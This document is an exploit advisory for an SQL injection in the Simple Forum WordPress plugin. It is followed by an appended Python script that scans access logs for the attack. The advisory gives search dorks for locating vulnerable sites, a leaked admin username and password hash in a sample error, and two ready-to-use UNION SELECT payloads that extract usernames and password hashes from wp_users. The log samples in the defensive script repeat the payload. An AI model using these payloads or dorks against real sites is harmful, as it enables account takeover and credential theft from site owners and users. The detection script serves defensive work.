
Simple Forum Version 1.10-1.11 SQL Injection






###############################################################
#
#   Simple Forum Version 1.10-1.11 SQL Injection
#
###############################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.milw0rm.com/author/1334
#
# MAIL : hackturkiye.hackturkiye@gmail.com
#
################################################################
   Simple Forum - Version 1.10

   Simple Forum - Version 1.10 - ( 2.1.3)

   Simple Forum - Version 1.11

################################################################

 EXPLAIN:

 Sometimes the username and password are in the error message; for example, you can see them in:

  (sometimes the passwords are inside the error messages)

WordPress database error: [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '|admin|b8329b6e20b9f84f7b44ee678a5f484d| WHERE topic_id=-1/**/UNION/**/SELECT/**' at line 1]
UPDATE wp_sftopics SET topic_opened = |admin|b8329b6e20b9f84f7b44ee678a5f484d| WHERE topic_id=-1/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users/*

################################################################

  DORK 1 :

  Simple Forum - Version 1.10
  Simple Forum - Version 1.10 - ( 2.1.3)
  Simple Forum - Version 1.11

  DORK 2 :  allinurl: topic "forums?forum="

################################################################
   example

http://xxxxx/forums?forum=xxxx&topic= (exploit)

  EXPLOIT 1 :

-99999/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users/*

   EXPLOIT 2 :

SOMETIMES YOU CAN'T SEE (xxxx&topic), SO USE THIS EXPLOIT AFTER forum=xxx(number)

  example

www.xxxxx/forums?forum=1(exploit)

&topic=-99999/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users/*


################################################################
# S@BUN             i AM NOT HACKER       S@BUN
################################################################
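
A defender-side check for the requests described above, as an added example that is not part of the original advisory: it scans web access logs for `forum`/`topic` values that are not plain integers. The Common Log Format, the sample log lines and the function names are assumptions made for the example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameters the advisory injects into; legitimate values are plain integers.
NUMERIC_PARAMS = ("forum", "topic")
# Request field of a Common Log Format line (the log format is an assumption).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# SQL keywords that appear in the advisory's payload, used only for triage.
SQL_TOKENS = re.compile(r"\b(union|select|concat|from)\b", re.I)

def suspicious_params(url):
    """Return {param: reason} for forum/topic values that are not integers."""
    findings = {}
    # parse_qsl percent-decodes, so encoded payloads are checked decoded.
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        if name not in NUMERIC_PARAMS or re.fullmatch(r"[0-9]+", value):
            continue
        findings[name] = "sql-keywords" if SQL_TOKENS.search(value) else "non-numeric"
    return findings

def scan(log_lines):
    """Return [(line_number, findings)] for every line with a bad parameter."""
    hits = []
    for lineno, line in enumerate(log_lines, 1):
        match = REQUEST_RE.search(line)
        found = suspicious_params(match.group(1)) if match else {}
        if found:
            hits.append((lineno, found))
    return hits

# Constructed sample log lines (documentation IP ranges, made-up timestamps).
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2008:10:00:00 +0000] "GET /forums?forum=1&topic=12 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2008:10:00:05 +0000] "GET /forums?forum=1&topic=-99999/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users/* HTTP/1.1" 200 4831',
    '203.0.113.9 - - [01/Jan/2008:10:00:09 +0000] "GET /forums?forum=1&topic=-99999%2F**%2FUNION%2F**%2FSELECT%2F**%2Fuser_login%2F**%2FFROM%2F**%2Fwp_users HTTP/1.1" 200 4831',
    '198.51.100.7 - - [01/Jan/2008:10:01:00 +0000] "GET /forums?forum=2&topic=7abc HTTP/1.1" 200 5003',
]

if __name__ == "__main__":
    for lineno, found in scan(SAMPLE_LOG):
        print(lineno, found)
```

The same integer-only rule belongs in the application itself, by casting the parameter to an integer or binding it as a query parameter. Log scanning only shows which requests already tried a non-integer value.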

